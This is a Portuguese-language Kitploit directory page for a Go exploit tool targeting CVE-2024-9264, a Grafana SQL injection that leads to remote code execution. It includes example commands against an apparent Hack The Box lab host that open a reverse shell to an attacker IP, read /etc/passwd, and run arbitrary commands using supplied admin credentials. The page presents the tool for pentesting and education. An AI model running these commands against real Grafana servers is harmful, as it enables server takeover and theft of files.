Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-9264 — A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x. | Kitploit
Ferramentas/GitHubGitHub/cythonic1/cve-2024-9264
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

A go implementation for CVE-2024-9264 which effect grafana versions 11.0.x, 11.1.x, and 11.2.x.

Ver Repositório
3há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

🚨 CVE-2024-9264 - Injeção SQL no Grafana levando a Execução Remota de Código (RCE) e leitura de arquivos

Ferramenta de exploit para CVE-2024-9264, uma vulnerabilidade crítica no Grafana que permite que um atacante autenticado execute consultas SQL levando a RCE

🛡️ Esta ferramenta é estritamente para fins educacionais e testes de penetração autorizados.
O uso não autorizado é ilegal e antiético.


🧠 Visão Geral da Vulnerabilidade

🕳️ O que é CVE-2024-9264?

CVE-2024-9264 é uma falha crítica no Grafana que permite que um atacante autenticado execute comandos SQL, levando a RCE e leitura de arquivos

🧬 Causa Raiz

  • Sanitização insuficiente.

💥 Impacto

  • RCE: Execute comandos arbitrários, obtenha shells reversos ou leia arquivos sensíveis.
  • Alta Gravidade: Possibilidade de assumir completamente o servidor se bem-sucedido.

⚒️ Funcionalidades

  • Suporta múltiplos modos de ataque:
    • file – Ler arquivos arbitrários (ex.: /etc/passwd)
    • shell – Shell reverso para a máquina do atacante
    • command – Executar comandos shell arbitrários (ex.: whoami)
  • IP, porta e credenciais do atacante personalizáveis

🚀 Uso

menu de ajuda

Nem todos os argumentos são necessários.

Exemplos

Obtendo shell

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

Ler arquivos

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

Executar comando único

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 Flags da Linha de Comando

go run main.go [flags]

Baixar ferramenta